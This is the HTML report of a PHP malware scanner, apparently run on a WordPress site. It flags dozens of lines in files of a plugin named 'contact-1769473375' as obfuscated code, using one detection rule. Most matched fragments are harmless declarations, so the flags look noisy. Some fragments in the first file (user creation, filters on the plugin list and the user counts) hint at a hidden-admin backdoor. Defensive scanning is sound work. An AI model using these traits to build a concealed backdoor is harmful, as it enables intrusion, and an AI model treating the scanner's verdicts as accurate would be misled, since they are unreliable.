<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_action'</span><span style="color: #007700">) &&</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'wp_insert_user'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpc_patch_bootstrap</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$query</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$views</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$views</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$m</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'(' </span><span style="color: #007700">. </span><span style="color: #0000BB">max</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">] - </span><span style="color: #0000BB">1</span><span style="color: #007700">) . </span><span style="color: #DD0000">')'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 83</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$plugins</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 88</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$plugins</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function () {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 93</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'username_exists'</span><span style="color: #007700">) && </span><span style="color: #0000BB">username_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$params</span><span style="color: #007700">[</span><span style="color: #DD0000">'user_login'</span><span style="color: #007700">])) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_222").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/wf-flyout/wf-flyout.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_223" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_footer</span><span style="color: #007700">() { if (</span><span style="color: #0000BB">false </span><span style="color: #007700">=== </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">is_plugin_screen</span><span style="color: #007700">()) { return; } </span><span style="color: #0000BB">$out </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">; </span><span style="color: #0000BB">$icons_url </span><span style="color: #007700">= </span><span style="color: #0000BB">plugin_dir_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_file</span><span style="color: #007700">) . </span><span style="color: #DD0000">'wf-flyout/icons/'</span><span style="color: #007700">; </span><span style="color: #0000BB">$default_link_item </span><span style="color: #007700">= array(</span><span style="color: #DD0000">'class' </span><span style="color: #007700">=> </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #DD0000">'href' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'#'</span><span style="color: #007700">, </span><span style="color: #DD0000">'target' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'_blank'</span><span style="color: #007700">, </span><span style="color: #DD0000">'label' </span><span style="color: #007700">=> </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #DD0000">'icon' </span><span style="color: #007700">=> </span><span style="color: #DD0000">''</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_footer</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$plugin_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_config</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_plugin_screen</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 79</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_enqueue_scripts</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 90</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_head</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_223").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/plugin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 23.21 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 58</span><br><table id="file_224" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_notice</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">"updated"</span><span style="color: #007700">) { </span><span style="color: #0000BB">printf</span><span style="color: #007700">( </span><span style="color: #DD0000">'<div class="%s"><p>%s</p></div>'</span><span style="color: #007700">, </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">), </span><span style="color: #0000BB">wp_kses_post</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">) ); } public static function </span><span style="color: #0000BB">protect_from_translation_plugins</span><span style="color: #007700">() { global </span><span style="color: #0000BB">$original_request_uri</span><span style="color: #007700">; </span><span style="color: #0000BB">$original_request_uri </span><span style="color: #007700">= </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">url</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_deactivation</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dismiss_notice</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 137</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">show_review_notice</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 170</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$vars </span><span style="color: #007700">= array())</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 174</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$url</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 180</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will check the current version </span><span style="color: #007700">and do </span><span style="color: #0000BB">any fixes required</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 182</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string </span><span style="color: #007700">- </span><span style="color: #0000BB">version number</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_self</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">EPS_REDIRECT_VERSION</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">nothing</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_migrate_to_v2</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">; </span><span style="color: #FF8000">// No redirects to migrate.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 239</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_create_redirect_table</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">dbDelta</span><span style="color: #007700">(</span><span style="color: #0000BB">$sql</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 270</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">plugin_resources</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 326</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">reset_pointers</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">handles various POST requests</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 344</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_plugin_actions</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 391</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">delete_all_rules</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 396</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 399</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">reset_stats</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 408</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">empty_3rd_party_cache</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 410</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'w3tc_flush_all'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 413</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'wp_cache_clear_cache'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 438</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'rocket_clean_domain'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 453</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">export_csv</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">handles the upload of CSV files</span><span style="color: #007700">, </span><span style="color: #0000BB">in accordance to the upload method specified</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_upload</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality </span><span style="color: #007700">and </span><span style="color: #0000BB">admin management</span><span style="color: #007700">.</span>
</span>
